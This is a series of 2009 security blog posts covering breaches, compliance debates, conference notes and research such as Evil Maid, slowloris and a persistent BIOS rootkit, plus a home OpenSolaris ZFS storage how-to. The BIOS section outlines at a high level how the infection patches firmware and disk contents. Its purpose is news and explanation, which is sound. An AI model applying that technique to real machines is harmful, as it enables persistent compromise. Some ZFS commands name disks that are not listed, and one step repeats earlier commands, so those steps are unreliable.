Thursday, November 26

Today's Security Variety

I've recently come across a few security related items of interest that I thought might be useful to everyone.

1. Shodan - a fairly robust internet search engine that can be used to identify specific products and interfaces. From the site:
"SHODAN lets you find servers/ routers/ etc. by using the simple search bar up above. Most of the data in the index covers web servers at the moment, but there is some data on FTP, Telnet and SSH services as well. Let me know which services interest you the most and I'll prioritize them in my scanning."
2. Social Media Governance - a site with resources targeted at organization's use of social media. This includes a list of companies such as Walmart, BBC and U.S. Airforce and their social media policies.

3. Wired Story on 9/11 Pager Texts - Looks like Wired is following the wikileaks break of millions of pager messages supposedly captured during the 9/11 terrorist attacks. This will be interesting to follow.

Friday, November 13

TLS Renegotiation Vulnerability

As many of you have already heard, there was a very serious vulnerability discovered in the TLS protocol that is used across the general internet to secure many many forms of communication, from the browser used to access banking online, to the protocols used to secure messaging servers.

The vulnerability itself is a design weakness found in the protocol's ability to renegotiate the encryption used in a session after a long-standing connection.

Here is a good write-up and links to some other information regarding the issue.

Stay tuned on this though - and expect many many patches and work-arounds to be issued by vendors.

Wednesday, November 11

RBS Worldpay Reading

Here are a few links from a few of the sites that are discussing the details of the RBS Worldpay hack.

SOURCE Conference
Cybercrime and Doing Time
Helpnet Security News

I'm going to try to find out more and maybe provide some additional analysis of how this hack seems to follow the same MO as the other credit/debit hacks.

Thursday, October 15

Evil Maid and the Challenges of Full Disk Encryption

Joanna and the crew over at Invisible Things have posted a tool to demonstrate how trivial it is to circumvent full-disk encryption products. Evil maid requires that you have access to the machine and can boot it using a usb-stick with the software installed. It then is able to transparently record the user's passphrase for the disk.

This is another example of how full-disk encryption products need to be architected carefully to ensure that problems like this can be considered and controls put in place to avoid them.

Thursday, October 1

NIST SMB Security Guide - Steps in the Right Direction

NIST has published an excellent draft guide on the basics of information security without throwing the users over the deep end. It seems to address the "certainties" of security risks, and provide very basic methods of addressing them, without being too product focused.

It is likely, although it will depend on the organization, that SMB's will need to work through this to understand how their current practices compare to this guidance, and figure out the most effective ways to address any short falls.

I would encourage all security professionals to give the guide a read and provide Richard with comments on improvements to make this guide as helpful as possible. Just don't be like Gartner's Adam Hills and post a critique before the standard is published.

Thursday, September 24

Mandating Protection, Society and Seatbelts

There are a number of discussions happening regarding the differences in risk based security vs compliance based security. These mostly have grown from discussions around PCI and other imposed standards of control. My opinion is that risk and compliance are two necessary actions.

Agusto, over at securitybalance blog is the latest to discuss the merits of compliance based security. I share his opinion that creating prescriptive measurable requirements goes a long way to improve the security of a large number of organizations. This is a given - I compare this other compliance programs like laws regarding the use of seat belts in automobiles. They exist because it is better to protect everyone to the same level of protection than it is to measure the specific protections required based on the roads that are being driven on that day, or the specific use of the vehicle, etc.

What this doesn't mean is that there isn't some degree of risk management being performed - its just that its not being performed at the vehicle operator level - where in many cases people would chose not to wear them out of inconvenience.

Like the laws for seatbelts, the larger risk which needs to be managed is not at the corporate level but at the societal level. The consequences of security failures at the organization level do not usually gain enough attention to warrant the appropriate protection, but I would argue that the consequences of systematic security failures across our society's infrastructure are the basis of massive harm.

Protecting our society at this level is the responsibility of our governments - and laws should be enacted to require adequate security protection, and impose legal penalties where they are not sufficient.

The identification of information warranting this protection is a required risk-based process. What types of information need to be protected in order to protect our people, our intellect, our industries and our livelihood?

To drive out the waste of objective-less risk management processes Anton asks the question on his blog-

"What is the risk-driven, correct frequency of changing my email password?"

Attempting to measure specific risks to a combination of the frequency of a control's failure and the existence of a real threat is for sure the wrong way to measure risk. But I think there still is a valid risk discussion regarding the use and standards of password use in protecting certain types of information. Lets rephrase:

"Should passwords be managed for systems that are used to communicate financial transaction data?"

This subjective question is far easier to qualify - and debate the merits and extent of compliance requirements associated with it. Will it make sense in every scenario in every organization? No. But will its application across the majority of scenarios in the majority of organizations help protect our livelihoods as a society? If the answer is yes - it should become a standard.

We need to define a scope of information which should be protected, create the standards to which the information should be protected, and institute formal legal processes to enforce compliance.

This is exactly what the FIPS and NIST standards describe? But these programs need to be extended to more than just federally controlled information types, and begin enforcing these rules on all data we value as a society.

Simple and Free File Examination

I know many people that despise running multiple version of desktop antivirus. One of these programs us usually enough to drop performance to a crawl. For those careful people who like to validate suspect files you get there is a great service VirusTotal.

This service works by accepting uploaded files from users, then running them through a series of tests and virus scanning engines, currently 41 different ones to be exact. This makes it extremely useful for gauging how to treat that questionable email attachment. It manages to do this by making hashes of the files that get uploaded then instead of using additional CPU cycles by scanning duplicate files, just matches the hash then returns the information to the user.

The other really cool part is that it provides detailed file information as well by analyzing the file's actual structure. Someone sends you a .jpg - but really it contains windows executable code ready to infect your machine. Find out what PE information, file structure, and signatures exist within the file.

Best of all the service is free - and actually gets a much better set of core data the more people that use it!

Monday, August 24

Gonzalez, Toey - Ringleaders?

It appears that there are a number of sources that are questioning the indictment of Gonzalez as a ring-leader such as the NY Times. I agree that Gonzalez is wrongly accused as the “ring-leader” of the operation - but for different reasons.

1. Gonzalez is likely just a low level carder (one who gathers and sells credit and debit card information), and one that was once on the secret service payroll to infiltrate the carder network. No different than other junkies that break into cars to steal ID information for drug money, but he just happened to use a more efficient method. SQL injection and wifi-sniffing are not very sophisticated attacks - nor was Albert’s MO - including leading a very lavish and noisy personal life. He used ICQ to chat with other affiliates and didn’t try to hard to protect information related to his wrong-doings.

2. The eastern European individuals named in the indictment appear to be MUCH more sophisticated as they organize the processes of converting the stolen information into cash. These guys are likely to be the real ring-leaders of the operation as they take the largest share of the profits. They normally operate out of non-extradition countries where they are permitted to operate as they wish. They still do slip up from time to time though as you can see with Maksym Yastremski sitting in Turkish Prison.

3. Even Gonzalez lawyer charges that Damon Toey was more of a ring-leader than Albert - but in reality both of these guys are simply carders - good ones, but carders nonetheless, both fencing card information to the European guys overseas for a small piece of the action.

It is my opinion that the US Attorney’s offices should describe these truths an these guys involvement in the scheme rather than try to make it falsely appear to the public that they’ve caught the “ring-leaders”. The should equally provide public information on how the whole scheme works. Wikipedia has some decent information for the uninformed, but doesn't get into how the organized portion of the fraud scheme really works. The RCMP even have a page for information, but again it just touches on the subject.

Maybe someone can post a link to a better explanation of the entire scheme.

Tuesday, August 18

Albert Gonzalez aka soup Nazi - 130M Records?

So it looks like the same suspect has been charged with both of the biggest credit card theft/fraud cases in history. Albert Gonzalez aka "segvec," "j4guar17" and "soup Nazi". Who is this man behind these crimes? What was the motivation behind the crime? What kind of training did this guy have? What kind of MO was used? 2 Russian accomplices? Who are these guys?

Secret Service Informant? - There must have been a more detailed file on this guy?

So many questions so little available information? If anyone has more credible information on this guy I would be very interested to hear more.

This story appears to have legs...

Wikipedia Page

Update 1:

Stephen Watt aka “Jim Jones” and “Unix Terrorist.” happened to be one of the unfortunate ones who associated himself with Albert - without any of the financial benefit however. Wired Story. Here is also a link to a page with his bio from Phrack magazine.

Update 2:

Here is link to the google docs version of the indictment of Gonzalez, Hacker 1 and Hacker 2.

Friday, July 31

Ineffective Laptop Recovery Software + Whitelisted Persistent BIOS Rootkit = Fail!

Following up their bleeding edge research on bios resident malware at CanSecWest the ultra-smart guys (Alfredo and Sacco) from CoreSecurity have disclosed a significant issue with the laptop recovery software LoJack.

I have debated the effectiveness of laptop recovery software many times arguing that its cost does not justify the recovery of the hard asset (how much is laptop hardware worth vs the cost of recovery).

But now this is even worse - by having this BIOS resident software installed (or pre-installed in an estimated 60% of new laptops - Lenovo, HD, Gateway, Dell, Toshiba) there is a significant exposure to having the LoJack software modified by someone malicious. Compounding this issue is the fact that the software is already white-listed by virus vendors meaning there would be no way to prevent or detect it from occurring.

Its a bit ironic when security software exposes its paying users to much more risk that it addresses. "Get it. And get it back - twice as bad."

Monday, July 27

PCI Compliance - Brand Fines Changing?

Looks like there is some rumors related to the payment brands changing their policies on fines levied on non-compliant merchants. Branden's security convergence blog is reporting changes to MasterCard's fine schedules for varying levels of merchant.

Wednesday, July 22

Top 10 Botnets

An interesting article was posted describing the today's top ten botnets and summary information describing there characteristics. The interesting thing is where conficker showed up (10th) and the percentage of these botnets whose criminal purpose is to collect valuable and sensitive information (1/10). Looks like most of these are intended to provide control - and then be capable of what ever the controller wishes.

Thursday, July 16

Twitter Hack - Techcrunch Ethics

There is a real storm of activity after documents which were gained through a hack of a Twitter employee's google apps account. Over at Techcrunch a heated debate over the ethics and newsworthiness over the public posting of the actual data that was ill-gotten is beating down the site's editors.

While it might be entertaining to voice opinions on people ethics regarding the outing of the actual information, I think the real story is the lapse in security of the Twitter employee. A bad, guessable password was used to protect access to very sensitive internal data - but this raises an important point regarding the use of Google apps or any other easily accessible service.

It really shouldn't take an incident like this for companies to get these types of simple protections over their information. If there is risk related to disclosure of the information - make sure you have it protected.

Wednesday, July 15

Anti-virus Statistics - Motivations

In a study completed and published by Avira ( The results of the survey showed that for 34 percent (3,207 respondents) a long-established, trustworthy brand was key. Almost as many users, 33 percent (3,077 respondents), based their decision on the virus detection rates achieved in independent tests.

Detection rates - lets call this effectiveness of the control - as this is the key metric used to measure effectiveness. This is a skewed metric as for the large majority of evaluations (ICSALabs, VB100, etc) use the "in-the-wild" or ITW list of viruses to perform the evaluations. There is no evaluation of these product's ability to respond or even detect newly released virus and malware.

In all honesty really what we are dealing with here is preventative vulnerability management not virus detection and correction, and in my opinion there are four types of preventative protections required for the average consumer (some are currently reality - others not):

1. The consumers buying products based on their security. This does not exist in any meaningful way for the general community. Lets get someone to independently evaluate the software makers on this and publish it for consumers to make choices based on their performance.

2. A service used to update software code quickly. There should also be an independent evaluation of a code's susceptibility to vulnerabilities and speed in which these are patched by the vendor. This should apply to all software not just operating systems and browsers. Again there could be independent evaluations of the companies policies, practices and past performance related to this.

3. A perfect ITW detection engine - 100% - there is no reason a product should be less than this for KNOWN viral code. Really this should be combined with #4.

4. A product to detect and respond to new threats - ones without signatures - which is a significantly larger threat as they are generally being developed with more financial motivation. Apple's and Microsoft's authorization of unsigned code is a good first step but this should be done at the CPU level to detect suspicious behavior by software and apply a policy to it. Do consumers actually read a warning about unsigned code? or do they just click "continue". AMD - Intel - Other chip makers? Is this possible at a low level? and how do we trust these companies themselves.

Anyone else have thoughts on other ways of preventing the impacts of vulnerabilties?

Tuesday, July 14

White-hat Budgeting

In response to his recent black-hat budget post I commented on what Richard has also described he would spend the 1 mil$ on in defense. Ends up that it doesn't buy you much - Although I agree with his approach to spend the cash on people and their ability to use the tools they already have access to.

I would take a slightly different perspective on the problem however. The 1$ million dollars is not just spent in one place but spent multiple times in defense of the black-hat team as they can target multiple organizations, i.e. the same team can move from target to target without spending any additional money, and force multi-millions of dollars in defense in multiple companies.

The other reality is that the defense is not just defending against one black-hat team but the potential for multiple black-hat teams.

My opinion is that like the black-hat teams, the defense should target the amount of money spent on the defense based on the potential loss of the information (or availability if that is the risk). This then would balance as you can spend less in focused efforts targeting protection of the specific information. There is no reason to spend $$$ on a commercial security management solution to protect only one table in a database where the sensitive information exists. The problem is that you have to know where that information lives through-out its life.

Sunday, July 12

Mobile Device Protection - Is this not standard practice yet?

Anyone need any more reasons to avoid situations regarding the loss of sensitive information on mobile devices? Dell has released the results of a study looking into actual data regarding lost mobile devices.

Tuesday, June 30

Blackhat Economics - Are you feeling safe today?

Just want to point people over to a great blog post over at TaoSecurity - Black hat budgeting. This is an excellent article which starts to examine the economic factors related to attacking and protecting information. Thinking in this way really puts some perspective on the security budget that people spend on attempting to protect information. Long story short - if you don't think or don't know if bad guys are targeting you - find out (what information are you protecting and why?), and if the bad guys are targeting you - you should be thinking this way.

Wednesday, June 17

New HTTP Flooding Tool - Apache Default Configuration

As application layer vulnerability research keeps driving forward, the guys over at keep blasting out lots of good stuff. This time its slowloris which is essentially an HTTP denial of service attack on certain types of web servers (very popular ones too!). At a high-level the attack creates a large number of partial HTTP connections very similar to TCP flood attacks of old, but of course at the application layer not the network layer.

Wednesday, June 10

New Research on RFC1918 Describes Vulnerabilities

Some new research published by Robert Hansen (aka RSnake) released a new paper on June 8th describing vulnerabilities associated with the way that browsers use caching and this can be abused when a client accesses content on different networks with matching internal non-routable IP addressing schemes.

The paper provides a description of the limitations of the attacks and the specific conditions which would make it possible. It would be prudent to review the paper and see if this applies to you.

Friday, May 29

US Cyber Security Report and Press Conference

As many of you have heard, President Obama has announced the release of the 60-day report and the appointment of a cyber-security czar to provide white-house oversight for the initiatives related to the recommendations.

Here are quick links to the pdf report, and to a video, video part-2 of Obama's press conference with the highlights.

Wednesday, May 20

Java Vulnerability within Fully Patched OSX - POC

Here is an excellent POC of javascript which exploits an unpatched vulnerability within any browser (firefox on mine). Beware of testing this link though as it attempted to change firewall settings when I visited.

Yet another reason to use a filter like noscript in the browser!

Here is an excellent explaination of what is going on with this one.

Thanks guys!

Wednesday, May 13

OpenSolaris, ZFS, iSCSI and OSX - Creative Storage - Part II

In part I of this post, I looked at the simple steps required to setup a relatively simple storage solution using OpenSolaris, ZFS, iSCSI and OSX. This was about a month ago, and I've made some significant changes on how this is used for me.

At the end of the last post I left off on the part dealing with configuration of the iSCSI initiator side of the solution. I stopped here because there were some issues related to the installation and use of the software.

The iSCSI initiator that I was using was Studio Network Solutions GlobalSAN initiator (version which is used to allow for connections to their products. This software will also allow for connections to ANY iSCSI target!

After the configuration of the iSCSI target on the ZFS pool, and installation of the client it was trivial to get the connection established with the storage pool, and it showed up in OSX as a raw disk which had not been formatted.

I proceeded to format the disk as HFS+ and it then mounted as a locally attached disk and I was able to use it as a target for the Time Machine backups. Once selected OSX nicely backed up all of my data to the volume! Perfect! Even the performance of the solution was suprising, as it appeared to significantly outperform previous backups made using USB disks attached to an Airport Extreme, and all of this over my 802.11n network!

Main Problem: Disconnections. Everything worked really well for me if the wireless network connection was active, the iSCSI client was properly started and connected, and Time Machine backups were closely monitored. While this will likely work really well for the guys with hard-wired gigabit connected Mac Pros that are never disconnected from the network or turned off, my MO includes constantly connecting and disconnecting from the network, and also in the middle of performing TM backups.

These disconnections immediately started causing problems with both the iSCSI client connections with the ZFS pool, and with the Time Machine processes associated with the disk. Symptoms included strange errors regarding mis-matches between the sparse disk images and the connected volume, and reconnection issues with the iSCSI client when my laptop gets reconnected to the network without stopping and restarting the iSCSI client.

Solution: CIFS. I always believe that simple solutions are better than complex ones, and although being able to use iSCSI connections to establish disk access seems cool, it doesn't offer a whole lot over standard-old network attached storage. The main reason behind the iSCSI configuration was to get TM to work with the ZFS pool, but there is an alternative - CIFS. There are many posts around the net regarding the use of CIFS and SMB shares for Time Machine backups.

So what I ended up doing is configuring a single ZFS pool for storage and splitting this storage into two - one for general file storage, and one for backups. TM uses sparse disk images which provide the added benefit of limiting the size of the disk image (this is used to limit the amount of disk space which is used by the TM backups - currently 2x the size of my source disk).

By using CIFS as the access method, I also have the ability of backing up my Windows boxes to the same filesystem along-side the TM disk images for each OSX machine.

In part III - when I get time, I will hopefully post the details on the CIFS setup (including security and file permissions), the OSX TM setup, and the Windows backup settings.

I have been using this setup for a few weeks now without a hitch and I have also restored files over the network. The only thing I haven't tested is restoring a full osx install from install DVD's using the TM backup (plan to test this).

Friday, May 1

PCI Compliance - IT or Legal Issue - New Paper

In a recent ISSA published article David Navetta has shared some excellent insight on the scope of PCI Compliance and some of the true risks to managing and delivering on its requirements. You can find the paper here.

Sunday, April 26

New Link, RSA Conference 2009 - Webcasts

The folks at the RSA conference have posted all of the key note speeches online. There are some good ones including James Bamford, Jamie and Adam from Mythbusters, and many others throughout the week.

Monday, April 20

New report released! - Office of the Auditor General of Alberta

The latest report from the Office of Auditor General of Alberta has been released this afternoon and contains several findings which point to specific deficiencies within the Government of Alberta's processes used to manage information risks and the effectiveness of their control environment.

It appears that even though additions and changes to the OAG budget have affected their future plans for auditing security, they are still moving forward with their audits and recommendations related to information security in the GOA.

Thursday, April 9

New Updates Conficker - April 9th

As expected, the conficker worm has continued it subtle updates and is using the newly acquired p2p functionality to do it. In addition it also appears to update the payload functionality and may also be actively defending itself by affecting the availability of the conficker working group site.

Researchers are looking at the new code and initial analysis points to key-logger software and new protection mechanisms. I think most security professionals would serve their clients well by keeping up to date on this.


It looks like the code is starting monetize, by installing a scamming anti-virus software package which costs you $49.99, and in some cases installing spamming relay software. There are also reports that it is set to delete itself on May 3rd (I'm skeptical about this one).

Time for law enforcement to do their job and follow-the-money!

Sunday, April 5

OpenSolaris, ZFS, iSCSI and OSX - Creative Storage - Part I

After getting through the steps required to setup a local network storage solution - I thought I would publish my steps for others that are doing the same thing. Not exactly security related but once the Solaris developers implement encryption into ZFS it will be :)

The needs for the solution were simple - a network (IP) based storage solution which is both reliable, meets performance needs and doesn't break the bank.

There are many people who would argue that a hardware based RAID array with it exposed through some NAS protocol would be a much easier solution to this need, but I'm intentionally trying to be cheap. The steps:

1. Hardware installation

Easiest part - install SATA disks on a supported platform for OpenSolaris. No details here unless someone wants them.

2. Software installation

OpenSolaris 2008.11 - 1 CD image found here. Burn the ISO, boot into the liveCD, double click on the "Install Solaris" icon on the desktop, and follow the instructions. I used many of the default options, but the installation will step you through it.

Reboot, and voila - default Solaris install with an SSH daemon running so that I don't have to use x-windows sessions.

3. ZFS Configuration

Connect with SSH to the console, check the installed disks.

root@CoreOpenSolaris:~# format
Searching for disks...done

0. c0d0 <DEFAULT cyl 1242 alt 2 hd 255 sec 63>
1. c3t0d0 <ATA-WDC WD10EADS-00L-1A01-931.51GB>
2. c3t1d0 <ATA-WDC WD10EADS-00L-1A01-931.51GB>
3. c4t0d0 <ATA-WDC WD10EADS-00L-1A01-931.51GB>
4. c4t1d0 <ATA-WDC WD10EADS-00L-1A01-931.51GB>
Specify disk (enter its number):

The first disk is the boot disk, which also uses the ZFS filesystem and won't be part of the raid. The other four will.

Create the ZFS pool.

root@CoreOpenSolaris:~# zpool create CoreStorage c3t0d0 c3t0d1 c3t1d0 c3t1d1

root@CoreOpenSolaris:~# zfs list CoreStorage
CoreStorage 400G 2.28T 41.9K /CoreStorage

Once the pool has been created we need to set a few properties to enable the types of access we want to provide. First is enabling CIFS and iSCSI access to the pool.

root@CoreOpenSolaris:~# zfs set shareiscsi=on sharesmb=on CoreStorage

4. CIFS Configuration

With the pool setup, we need to configure Solaris to provide connections for CIFS and iSCSI. Lets focus on CIFS first. The CIFS packages are not installed by default so we need to install them.
root@CoreOpenSolaris:~# pkg install SUNWsmbs SUNWsmbskr

Then add the driver, start the service, configure the PAM services needed to properly authenticate (I needed to reboot after these steps).
root@CoreOpenSolaris:~# add_drv smbsrv
root@CoreOpenSolaris:~# svcadm enable -r smb/server

I then needed to re-set the password of the user that will be using the share.
root@CoreOpenSolaris:~# add_drv smbsrv
root@CoreOpenSolaris:~# svcadm enable -r smb/server

Part two of this will include the iSCSI Target and Initiator Configuration, and a discussion of the advantages/disadvantages of using this.

Wednesday, April 1

Conficker Reporting

There has been so much misinformation being spread regarding what conficker will or will not do. And now that the mainstream media is picking up on the story they are repeating some of the speculation. I like to look at it in simple terms without muddling in all the technical details;
  • All the research done suggests that the people behind conficker are intelligent, and well resourced which indicates that whatever motivation they have will be very well thought out and executed.
  • The large amount resources used to develop and maintain conficker mean that the owners will spend large amounts of effort defending it and increasing its ability to spread efficiently.
The whole circus around April 1st was the fact that the software would begin receiving new instructions, in no way did this mean that it would start acting in a more malicious way. The simple fact is that this virus could do anything it wants, and we should be prepared to handle this today or any of the other 365 days of the year.

I hope that the media starts focusing on the security of computing including all the risks one of which is worms, and more on common prevention and detection techniques that can keep us all safer.

Monday, March 30

Older TOR Research Paper - Privacy and Security Study

I stumbled across an older research paper from the University of Colorado discussing the traffic patterns for data flowing into and out of the TOR network. Very interesting read, and I like the inventive methods for detecting "sniffing" exit nodes, although I must say that anyone with a bit of knowledge regarding how to quietly listen using TCPdump -n.

Thursday, March 26

Securing OSX - Apple's Leopard Security Guide

Worried about the default configuration of Leopard OSX 10.5? Take a read through Apple's own security configuration guide. This guide covers the installation to advanced configuration options including turning off hardware support for USB, Bluetooth, Video, Wireless, etc for the most paranoid out there.

Mac users can also look forward to getting more advanced security features as part of the 10.6 release of OSX-Snow Leopard you'll be glad to know that rumors point to modern security features like enhanced ASLR with 64bit memory space, and full NX support.

Charlie Miller - Toms Hardware Exclusive

Tom's Hardware has posted an excellent interview with Charlie Miller who was successful at hacking a fully patched OSX box at this year's CanSecWest. Here is the interview. Very insightful answers to the questions.

Wednesday, March 25

SmartPhone Pwn2Own Results Reflect Security of the Device?

Since the CanSecWest conference last week a few people on the net have been reporting (Gizmodo, Slashdot, Engadget) that because none of the smartphone platforms were compromised (I think there was only a single attempt if I heard right) and that these devices must be inherently secure or a lot harder to hack than Safari and the rest of the browser crew.

After hanging out with a few of the researchers at the conference, and witnessing first-hand some of the technical prowess they possess, it seems a little strange to me that the security of these handsets pose a challenge to these people.

Adding to my skeptisim is the fact that many of the researchers at the conference were supporting the stance of "no more free bugs". Which I support - as there is a very real thriving underground economy for bugs and exploits - and researchers deserve to get compensated for the knowledge and expertice, not to mention that the pwn2own contest rules sign-over ownership of the bug to TippingPoint (ZDI) for basically the cost of the hardware plus 10K.

My theory on why the smartphones survived the pwn2own ordeal is not that they are uber-secure, but that the researchers know that the bugs they have for them (and based on what these guys can do on platforms that have been secured for years they DO have them) felt that the compensation that they were being offered does not even come close to the value the bugs have to other potential buyers and future uses.

I would argue that bugs on these platforms are much more valuable than say a browser exploit, or Vista hack, as taking control of a smartphone with its advanced functionality, personal connection to the owner and lack of security awareness for the platform.

Anyway, my little theory on smartphone security.

Monday, March 23

A few more details regarding the peristent BIOS infection

If you were lucky enough to attend this year's CanSecWest conference than you probably sat through Anibal Sacco and Alfredo Ortega's talk on the BIOS infection, and how this would persist even through a hard-drive wipe / operating system reinstall. These guys are extremely bright and are pushing hard at the edge of security research.

The slideshow published by Core Security, provides the overview, which I'll summarize here with what I can remember of the technology and tools used to enable the hack shown at the conference.

First is getting a copy of a BIOS to hack. There are two options, and one which made the researcher's lives easier, VMware supplies both a generic "virtual" BIOS and a debugger which makes testing and developing the patches easier. A generic tool also exists which they have created to retrive, modify and reflash the BIOS based on previous work by pinczakko.

The second thing talked about is the structure of the BIOS which gets executed by the CPU when the computer first boots, and the operating system has not yet loaded. The whole point of describing this structure is that BIOS structure differ between different manufacturers and models of motherboards, and these differences make it difficult to predict where to make certain changes. The researchers found that almost all modern BIOS versions however use the identical decompression utility used to expand other pieces of code in the BIOS for devices such as video cards, north and south bridges, etc. This code is easy to find using pattern matching in the BIOS. Once this section of code is found, it can be patched with a different decompression utility, making the hack possible. The other cool thing, if I'm not mistaken, about the decompression utility is that it is OS independent meaning that it will run on multiple CPU architectures (x86, AMD64, etc).

One of the key features of the BIOS is having access to the computer's hardware before the operating system, which makes doing things like patching hard disk bytes possible. Once just has to know what to search for (password files, ini files, etc) and changes can be made directly.

They also hint at being able to do other things with the code, like utilizing, accessing, modifying other devices which are interfaced with at boot time (video, ethernet, RAID, etc). This is cool because one of the things that loads in most modern BIOS is netboot or Preboot Execution Environment (PXE). Imagine that as the PC boots that a network stack is enabled, a malicious site is contacted for updated code, and additional hacks performed as desired, seems like the ultimate, very-hard to detect rootkit.

Even more concerning would be the creation of BIOS resident blue-pill type hypervisor.

UPDATE: Alfredo has informed me that the did not develop CoreBoot, they use the great opensource tools found here. Core Security developed their own toolset for these tasks CoreBoot. This project contains the code necessary to flash, patch and calculate the right checksums for the BIOS to work properly. They have not posted this on their public site, and am not sure if they intend to.

*Very cool stuff indeed.*

Friday, March 20

PII Guide Draft from NIST - SP800-122

SP800-122 - is a relatively new draft guideline regarding the protection of confidentiality related to personal information. Check it out.

Thursday, March 19

Update from CanSecWest

So most of the way through the second day of the conference there have been some really interesting topics. Here is a list of the top ones for me:

Unicode vulnerabilities - Although it was cut short due to running over time, Chris Weber, from Casaba Security gave an excellent description of a large number of unicode issues which plague web applications. His favorite - BOM.

Sniffing Keystrokes - What a nice change in pace - the two Italians put on quite a show regarding the use of two side channel attacks on keystrokes. One regarding the electrical noise that poorly shielded PS2 connectors, and the other by recording and analyzing vibrations from typing on laptops by using cheap lasers!

Chinese Hacking Culture - Wow, what a great opportunity to hear from a security professional working inside the hacker community in China! Excellent talk, and cudos to ICBM for getting the message across and even answering questions with a significant language barrier.

More later.

Monday, March 16

Updates from CanSecWest

I am attending CanSecWest this week in Vancouver, British Columbia, and will be updating my blog frequently to recap some of the high-lights of the event. Monday will be pretty slow as people make it into town and get settled.

Tuesday, March 10

Prioritizing PCI Compliance Activity

In new guidance offered by the PCI Security Standards Council, a checklist has been provided to assist organizations with focusing on the important issues first, and spending time where the greatest risks exist. This is very useful for organizations with limited funding and resources.

Tuesday, February 24

FISMA - Compliance Guidance Drafted by CSIS

A new draft publication has been made available by the Center for Strategic and International Studies (CSIS), whose goal is:
“Establishing a prioritized baseline of information security measures and controls
that can be continuously monitored through automated mechanisms.”
Based on the inputs of the research including groups from public and private sectors, this vendor neutral document seems to high-light the real need for effective and auditable security controls, that aren't somehow linked the next best product offering.

Zero day targeted threats - don't panic if they are targeted?

According to a IT Knowledge Exchange article, we shouldn't panic because a zero day threat in software that almost every enterprise has installed are not spreading rapidly and are in most cases targeted.

Arent' these exactly the threats that we should be worried about? In fact I would argue that for every 0-day threat reported there are five more unreported. And in cases where the attacks are motivated (targeted) there is likely a greater probability of loss.

In my opinion the criteria we use to gauge the risk related to vulnerabilities shouldn't include how noisy and fast the infection rate is, but instead look at the impacts and probabilities of being targeted.

Saturday, February 14

Alberta's Audit of IT Security Halted

The Edmonton Journal is reporting that due to budget constraints four key investigations are being stopped. This includes investigation's into the Government's IT Security practices.

Although it appears that this would appear to be another disappointing effect of the economic situation, I would argue that it makes sense to direct the limited amount of funding into programs which improve the Government's security posture.

Sunday, February 8

ISACA Publication - RISK IT governance processes for managing IT Risks

ISACA recently released an exposure draft of their new governance framework "Risk IT". This framework describes in detail recommended processes for organizations to adopt to manage IT risks effectively. I'll try to follow this post up with a review of this draft and provide some commentary on related values and shortcomings of this new framework.

Wednesday, February 4

New Google Maps for Mobile - Latitude

As we continue to get more connected, google continues to allow us to search, track and map things, which now includes people as they release an update to the mobile version of their maps program.

And look what I see in there in one of the images used to show it off - putting Edmonton literally on the map!

Application Security Procurement Language

After publishing the SANS Top 25 Application security issues list, a small group of people in New York state have provided a set of contract language and requirements which organizations can use to ensure software development contracts have appropriate requirements for ensuring security. Although the vendor communities might not be thrilled by the prospect of having to train and maintain the security skills of their development staff, I would agree that this type of control goes a long way to ensuring issues get resolved at the source.

Monday, February 2

ISC2 Releases Online Resource Guide

ISC2 today has released an online resource guide accessible online or in download form. The guide provides up-to-date pointers to things like events, online resources and related organizations that provide information regarding information security.

Another place to bookmark and use for researching security topics.

Monday, January 26

Aligning Online Security Interests

There was an interesting discussion regarding the larger societal problems associated with the use of insecure online services over at Wade Woolwine's blog. This is a follow-on to the discussion by Jeremiah Grossman - regarding the alignment of interests in web security.

This discussion centered around the topic of how to align interests related to protecting online information. I have separated this problem into what I think are three important parts,
  1. Definition of common goals,
  2. Evaluation of online services against these definitions, and
  3. Education of consumers/clients/users of the product standards and evaluations.
As a security professional, I often use the metaphor of information security controls as they mirror the emergency brakes used car, in the fact that they are used as risk mitigation. The faster you want to get from A to B, the more robust brakes you need. In addition for the purposes of this discussion, for vehicles in Canada there is also a minimum standard of brake required to even be allowed on the street, and this contrasts to the security of online services where there is no minimum standard required.

As I discuss each of these, I will try to compare it to the Canadian vehicle industry where a very robust system (not perfect though) exists to help educate consumers to make smart security decisions about the cars they drive based on their regulated safety features.

Defining common security goals

Unlike the auto industry, online security has had a difficult time defining common language and standards for what a 'safe' online service would consist of. Payment Card Industry has one standard which pertains to a very small subset of data, and other regulations such as the Health Information Act and the Privacy Act offer some indirect guidance. For Automobiles, the Government under the authority of Transportation Canada provides very specific language as part of the Motor Vehicle Safety Act (MVSA). As you would expect, this act has very definitive instructions on what is required in terms of controls within the different classes of motor vehicles in Schedule III in order to comply with the requirements.

In contrast, the only instance I can find of Canadian federal government definitions of online service security goals would be for Privacy Act, and Personal Information Protection and Electronic Documents Acts. These laws are focused squarely on the collection and use of personal identifying information through electronic and non-electronic means, and do not address the delivery of any online services affecting commerce, media publications or any other online service we interact with.

There are many questions related to establishing a common definition of security goals. What are the risks to Canadian society, people and businesses through the use of unsafe online services, and how do we measure them? Is the current privacy legislation broad enough and strong enough to be effective at protecting Canadian people and businesses from the risks of connecting to online and electronic services? Is there a justifiable need to define more specific standards for the safety of online services to allow for them to be independently evaluated like cars are?

Evaluation of Products and Services

Crash tests and safety ratings are a part of the development of every automobile sold in Canada. Canadian manufacturers of these products spend a great deal of money and effort ensuring that their products will pass the minimum standards and they provide self-certification that they comply with the legislated requirements. Although I couldn't find a study to show it, I would imagine that the majority of Canadians would expect correctly that a vehicle purchased in Canada would be already compliant with these standards and thus feel comfortable in the fact that when they step on the brakes that the car will stop.

Again in contrast, there is no way for a Canadian to know whether an online service that they are interacting with is compliant with any online regulation or certification established to protect their interactions and dealings with the service. I would also expect that in a similar poll of Canadians that most would admit to being skeptical of the security and safety of transacting with many online services - even the Canadian government's own services - and that in many cases prevents them in utilizing these online services.

Is this level of skepticism related to online interactions acceptable to Canadian society? And is individual demands for the safety of the online services enough? If demands for vehicle safety were left to the consumer alone, would this be enough incentive to ensure vendors protect us?

Enforcement and Education

Transport Canada also provides some handy guidelines which explain the methods in which the regulations are enforced. These are very carefully worded and provide an excellent description of the objectives, roles and responsibilities of the various Government agencies in ensuring compliance with the regulations.

This is again entirely different when we look at the world of online security, yet this is also to be expected as the legislation, regulation and standardization have not been established. At the same time it does not take that much imagination to conceive of a similar arrangement for ensuring the standardization of online services provided by Canadian entities. Could we not have a set of criteria to which Canadian based organizations, public and private, design their services to be protected against? Is is too far fetched to think that we could have a national safety mark that we could use to certify online services?


